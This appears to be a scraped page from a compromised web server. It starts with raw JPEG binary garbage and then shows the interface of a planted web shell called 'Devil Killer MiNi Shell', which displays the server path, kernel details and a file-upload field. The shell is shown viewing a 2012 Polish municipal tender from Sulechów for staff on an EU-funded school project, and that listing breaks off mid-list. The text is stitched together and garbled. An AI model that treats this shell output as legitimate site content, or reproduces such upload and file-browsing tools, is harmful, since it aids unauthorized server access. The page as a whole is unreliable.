JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121015/399002-N-2012.html

<p class="kh_header"><b>Sulechów: Projekt Widzę i rozumiem dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, w tym: 
zadanie A - Kierownik projektu, zadanie B - Asystent ds. technicznych i promocji, 
zadanie C - Specjalista ds. finansowych</b><br>
<b>Numer ogłoszenia: 399002 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt Widzę i rozumiem dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, w tym: 
zadanie A - Kierownik projektu, zadanie B - Asystent ds. technicznych i promocji, 
zadanie C - Specjalista ds. finansowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja projektu Widzę i rozumiem dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 (www.efs.gov.pl), w tym:
1.1.	ZADANIE A - Kierownik projektu - osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i ukończone szkolenie z prowadzenia i rozliczania projektu, oraz zarządzania personelem w ramach Programu Operacyjnego Kapitał Ludzki i z generatora wniosków płatniczych. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi wykształcenie oraz ukończenie szkoleń.
1.1.1.	Zadania realizowane przez kierownika projektu:
-	przeszkolenie lub zapewnienie przeszkolenia kadry z zakresu zasady równości płci w projekcie, 
-	zapewnianie pomocy Zleceniodawcy w trakcie przeprowadzania kontroli wewnętrznych i zewnętrznych w okresie realizacji projektu jak również po jego realizacji,
-	  nadzór nad rekrutacją, 
-	odpowiedzialność za wysoką jakość merytoryczną projektu, realizację celów i wskaźników projektu,
-	dokonywanie systematycznej kontroli pracy i uzyskanych efektów, rezultatów  i wskaźników projektu,
-	 wdrażanie działań ewaluacyjnych; 
-	opracowanie szczegółowego harmonogramu zajęć zgodnego z planem pracy szkoły,  
    dowozami uczniów uzgodnionego z dyrektorem szkoły. 
-	organizacja zajęć,
-	zatwierdzenie planów zajęć; 
-   nadzór nad przebiegiem zajęć i nad prawidłowym ich dokumentowaniem;
-   hospitowanie zajęć;
-	bieżąca pomoc uczestnikom projektu; 
-	bieżąca współpraca z dyrektorem szkoły; 
-	prowadzenie korespondencji i rozmów z rodzicami uczniów; 
-	prowadzenie biura projektu;
-	pomoc w przygotowaniu zamówień publicznych.;
-	analiza budżetu; 
-	przygotowanie, opracowanie i przeprowadzenie wraz z asystentem ds. technicznych i  
     promocji:
a)	1 sprawozdania z realizacji planu rozwoju Gimnazjum nr 2 w Sulechowie w zakresie objętym   
      projektem,
b)	ankiet ewaluacyjnych wszystkich zajęć projektowych (dwukrotnie),
c)	3 ankiet badających poziom kompetencji osobistych uczestników projektu kształconych w   
      ramach zajęć Jak się uczyć?,
d)	3 testów interaktywnych badających poziom kompetencji z matematyki wśród wszystkich       uczestników,
e)	2 testów badających poziom kompetencji z fizyki i chemii wśród wszystkich uczestników 
     projektu.
-	nadzór nad przebiegiem wycieczki;
-	organizacja i poprowadzenie  Festiwalu Nauki; 
-	piecza nad ochroną danych osobowych,
-	dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni -sali, sprzętu i 
     urządzeń wykorzystywanych w trakcie realizacji projektu,
-	przestrzeganie obowiązujących przepisów prawa i Statutu Szkoły, w której będą prowadzone 
      zajęcia,
-	nadzorowanie prawidłowości przygotowania wymaganych sprawozdań do Instytucji 
      Pośredniczącej w wymaganych i obowiązujących terminach w oparciu o obowiązujące zapisy w 
     dokumentach programowych Programu Operacyjnego Kapitał Ludzki,
-	uzgadnianie z Instytucją Pośredniczącą i przekazywanie jej w formie pisemnej informacji o  dokonywanych zmianach w projekcie,
-	wprowadzanie w Generatorze Wniosków Aplikacyjnych zmian do projektu w oparciu o 
     obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie o dofinansowanie projektu, 
    dokumentacji programowej Programu Operacyjnego Kapitał Ludzki,
-	sporządzanie w zakresie merytorycznym wniosków o płatność w Generatorze Wniosków Płatniczych i bieżąca współpraca ze specjalistą ds. finansowych projektu, 
-	współudział w sporządzaniu załączników do wniosku o płatność,
-	sporządzanie formularza Podsystemu monitorowania Europejskiego Funduszu Społecznego,
-	przygotowanie zaplecza technicznego projektu w tym nadzór nad instalacją zakupionego sprzętu 
     laboratoryjnego i jego zabezpieczenie,
-	codzienna dyspozycyjność w trakcie realizacji całego projektu.
-	śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w 
     celu zapewnienia zgodności projektu z wytycznymi jak również prawodawstwem polskim i Unii Europejskiej,
-	opisywanie faktur zgodnie z wymogami wynikającymi z przepisów dotyczących wdrażania  programów współfinansowanych z Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, 
- 	zatwierdzanie list płac; sprawdzanie faktur pod względem merytorycznym; 
-	przygotowanie i uporządkowanie oryginałów dokumentacji oraz przekazanie jej do archiwum Gminy a kopii do archiwum szkoły. 
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach  rozliczenia wynagrodzenia.
Miejsce i czas wykonywania obowiązków:  
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum 4 godziny tygodniowo będzie dyżurował kierownik projektu. W miesiącu kierownik musi przepracować minimum  60 godzin. Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu. 
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012 r. do 30 czerwca 2014 r. z wyłączeniem miesięcy wakacyjnych.
1.2.	ZADANIE B - asystent ds. technicznych i promocji - Osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i posiadać ukończone szkolenie z prowadzenia i rozliczania projektu w ramach Programu Operacyjnego Kapitał Ludzki. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi wykształcenie oraz ukończenie szkoleń.
1.2.1.	Zadania realizowane przez Asystent ds. technicznych i promocji projektu:
-	opracowywanie sprawozdania z ewaluacji osiągnięć uczestników projektu,
-	codzienna dyspozycyjność w trakcie realizacji projektu,
-	przygotowanie ankiet ewaluacyjnych i oceniających,
-	nadzór nad wydawaniem posiłków dla uczniów w czasie zajęć projektowych,
-	aktualizacja formularza Podsystemu monitorowania Europejskiego Funduszu Społecznego,
-	bieżąca pomoc uczestnikom projektu; 
-	prowadzenie biura,
-	organizacja zaopatrzenia, 
-	opisywanie faktur; 
-	pomoc w przygotowaniu sprawozdań merytorycznych; 
-	wykonanie projektów materiałów promocyjnych i organizacja ich montażu; 
-	przygotowanie i realizacja strategii rekrutacji uczestników projektu (opracowanie regulaminu 
      rekrutacji, nadzór nas przygotowaniem formularzy rekrutacyjnych zgodnie z wytycznymi 
       Programu Operacyjnego Kapitał Ludzki), przeprowadzenie rekrutacji uczestników projektu,
-	zebranie deklaracji od uczestników projektu i ich rodziców;
-	zredagowanie i umieszczenie artykułów informujących o projekcie, jego przebiegu  i zakończeniu  na stronie www szkoły, Gminy Sulechów, w Biuletynie Informacyjnym Gminy,    szkolnej gazetce  i gazetach lokalnych; 
-	oznakowanie sprzętu i materiałów dydaktycznych zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki; 
-	opracowanie projektu dziennika zajęć;
-	przygotowanie formularzy i dokumentowanie przebiegu projektu;
-	organizacja wycieczki i Festiwalu Nauki;
-	opracowanie i zamówienie certyfikatu Młody Chemik i Fizyk;
-	uporządkowanie dokumentacji projektowej; 
-	opracowanie, przeprowadzenie i analiza testów kompetencji;
-	przygotowanie, opracowanie i przeprowadzenie wraz z kierownikiem projektu:
a)	1 sprawozdania z realizacji planu rozwoju Gimnazjum nr 2 w Sulechowie w zakresie objętym   projektem,
b)	ankiet ewaluacyjnych wszystkich zajęć projektowych (dwukrotnie)
c)	3 ankiet badających poziom kompetencji osobistych uczestników projektu kształconych w 
     ramach zajęć Jak się uczyć?
d)	3 testów interaktywnych badających poziom kompetencji z matematyki wśród wszystkich 
     uczestników
e)	2 testów badających poziom kompetencji z fizyki i chemii wśród wszystkich uczestników    projektu
- 	wykonywanie innych czynności zleconych przez kierownika projektu,
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach rozliczenia wynagrodzenia.


Miejsce i czas wykonywania obowiązków:  
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum 3 godziny tygodniowo będzie dyżurował asystent ds. technicznych i promocji. W miesiącu asystent ds. technicznych i promocji musi przepracować minimum 50 godzin.  Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu.
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012r. do 30 czerwca 2014r. z wyłączeniem miesięcy wakacyjnych.
1.3.	ZADANIE C - Specjalista ds. finansowych - osoba na tym stanowisku musi posiadać doświadczenie w rozliczaniu projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi doświadczenie.
1.3.1.	Zadania realizowane przez Specjalista ds. finansowych projektu:
-	weryfikowanie i akceptowanie pod względem formalnym i rachunkowym dokumentów, które powstały w projekcie, z uwzględnieniem zasad kwalifikowalności wydatków.
-	współpraca z osobami zaangażowanymi w realizację projektu.
-	bieżący monitoring przepływów pieniężnych - czuwanie nad terminowym regulowaniem płatności.
-	sporządzanie kompletu dokumentów rozliczeniowych zgodnie z ustalonym harmonogramem płatności: wniosków o płatność w aplikacji Generatora Wniosków Płatniczych Programu Operacyjnego Kapitał Ludzki /części finansowej/, załącznika nr 1 do wniosku o płatność, składowych wynagrodzeń, wyciągów bankowych potwierdzających zrealizowane wydatki itp.
-	sporządzanie sprawozdań z realizacji wydatków projektu według obowiązujących przepisów dotyczących sprawozdawczości budżetowej.
-	udzielanie bieżących informacji Zleceniodawcy, personelowi zarządzającemu i Dyrekcji szkoły na temat stanu realizacji poszczególnych zadań projektu w ujęciu finansowym.
-	zapewnienie pomocy Zleceniodawcy w trakcie przeprowadzania kontroli zewnętrznych i wewnętrznych w okresie trwania projektu, jak również po jego realizacji.
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach rozliczenia wynagrodzenia.
-	sporządzanie wniosków płatniczych, 
-	finansowe rozliczanie każdej otrzymanej transzy;
-	sporządzanie listy płac z tytułu zawartych umów, 
-	sporządzanie w trakcie i na koniec projektu finansowego sprawozdania rozliczającego dotację;
-	prowadzenie korespondencji finansowej; 
-	analiza budżetu projektu,
-	wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi zdolność do wykonywania zamówienia.
Miejsce i czas wykonywania obowiązków: 
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum  3 godziny tygodniowo będzie dyżurował specjalista ds. płac. W miesiącu specjalista ds. finansowych musi przepracować minimum 40 godzin. Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu.
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012r. do 30 czerwca 2014r. z wyłączeniem miesięcy wakacyjnych.
2.	Celem projektu jest realizacja programu rozwoju Gimnazjum nr 2 wśród 80 uczniów poprzez podniesienie jakości i skuteczności nauczania z przedmiotów matematyka, fizyka i chemia w latach 2012-2014.
3.	Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 i znajdować się będzie w szkole z dostępem do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu oraz kopie dokumentów finansowych znajdować się będą w biurze. 
4.	Wykonawca może przewidzieć wykonanie przedmiotu umowy przy pomocy podwykonawców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie A - Kierownik projektu - osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i ukończone szkolenie z prowadzenia i rozliczania projektu, oraz zarządzania personelem w ramach Programu Operacyjnego Kapitał Ludzki i z generatora wniosków płatniczych.
Zadanie B - Asystent ds. technicznych i promocji - osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i ukończone szkolenie z prowadzenia i rozliczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Zadanie C - Specjalista ds. finansowych - osoba na tym stanowisku musi posiadać doświadczenie w rozliczaniu projektów w ramach Programu Operacyjnego Kapitał Ludzki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty na załączniku nr 1.
2.	Dane Wykonawcy na załączniku nr 1a.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował 
zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne 
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt IV, ppkt 1.3.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
1)	stawki podatku od towarów i usług w przypadku ustawowej zmiany stawek, a w konsekwencji zmiany (podwyższenia lub obniżenia) kwoty brutto wynikającej z umowy, 
2)	nazwy zadania, numerów kont bankowych oraz działów, rozdziałów i paragrafów klasyfikacji budżetowej,
3)	przedstawicieli stron,
4)	 zlecania prac podwykonawcom - zmiana sposobu realizacji przedmiotu zamówienia w tym zakresie możliwa będzie w przypadku gdy Wykonawca nie zadeklaruje w swojej ofercie wykonania przedmiotu zamówienia przy pomocy podwykonawców lub zadeklaruje wykonanie części przedmiotu zamówienia przy pomocy podwykonawców w określonym zakresie, a docelowo zechce dokonać zmiany tego zakresu lub konkretnego podwykonawcy; Wykonawca może wnosić o dokonanie zmiany umowy dotyczącej zlecania prac podwykonawcom, gdy zmiana taka przyczyni się do poprawienia szybkości lub jakości uslug stanowiących przedmiot umowy, uchylenia niebezpieczeństwa opóźnień lub zwłoki w realizacji przedmiotu umowy, względnie wskazana jest ze względu na wymóg specjalistycznej wiedzy lub doświadczenia, niezbędnych do prawidłowego wykonania przedmiotu umowy.
5)	 terminu wypłaty wynagrodzenia określonego w § 4 ust. 1 umowy może ulec zmianie w sytuacji, gdy na konto Projektu nie zostanie przekazana przez instytucję pośredniczącą wystarczająca suma środków przeznaczonych na wypłatę wynagrodzenia. Opóźnienie wypłaty wynagrodzenia Zleceniobiorcy w okolicznościach opisanych powyżej nie stanowi podstawy do żądania przez Zleceniobiorcę dodatkowych świadczeń (odsetek itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Sulechów Plac Ratuszowy 6, 66-100 Sulechów, pokój nr 119b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 09:30, miejsce: Gmina Sulechów Plac Ratuszowy 6, 66-100 Sulechów, pokój nr 002 - Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt -Widzę i rozumiem- dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 (www.efs.gov.pl).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE A - Kierownik projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE A - Kierownik projektu - osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i ukończone szkolenie z prowadzenia i rozliczania projektu, oraz zarządzania personelem w ramach Programu Operacyjnego Kapitał Ludzki i z generatora wniosków płatniczych. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi wykształcenie oraz ukończenie szkoleń.
1.1.1.	Zadania realizowane przez kierownika projektu:
-	przeszkolenie lub zapewnienie przeszkolenia kadry z zakresu zasady równości płci w projekcie, 
-	zapewnianie pomocy Zleceniodawcy w trakcie przeprowadzania kontroli wewnętrznych i zewnętrznych w okresie realizacji projektu jak również po jego realizacji,
-	  nadzór nad rekrutacją, 
-	odpowiedzialność za wysoką jakość merytoryczną projektu, realizację celów i wskaźników projektu,
-	dokonywanie systematycznej kontroli pracy i uzyskanych efektów, rezultatów  i wskaźników projektu,
-	 wdrażanie działań ewaluacyjnych; 
-	opracowanie szczegółowego harmonogramu zajęć zgodnego z planem pracy szkoły,  
